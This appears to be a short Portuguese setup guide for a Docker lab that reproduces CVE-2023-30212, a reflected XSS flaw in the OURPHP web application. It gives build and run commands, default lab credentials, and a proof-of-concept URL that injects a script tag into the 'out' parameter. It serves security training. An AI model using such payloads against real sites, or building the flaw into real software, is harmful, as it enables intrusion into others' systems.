
Ambiente vulnerável baseado em Docker para praticar exploração de CVE-2023-30212, apresentando um aplicativo web OURPHP com uma vulnerabilidade XSS refletida para treinamento de segurança.
git clone https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-.git
agora para configurar a imagem docker
use o comando sudo docker build -t work .
use o comando sudo docker run -d -p 80:80 work
agora obteremos o id do container
vá para o navegador e procure por localhost ; 127.0.0.1
agora use as credenciais
username : root
password : docker
database : work
username : work password : work
vá para a url http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
receberemos uma mensagem de alerta "xss".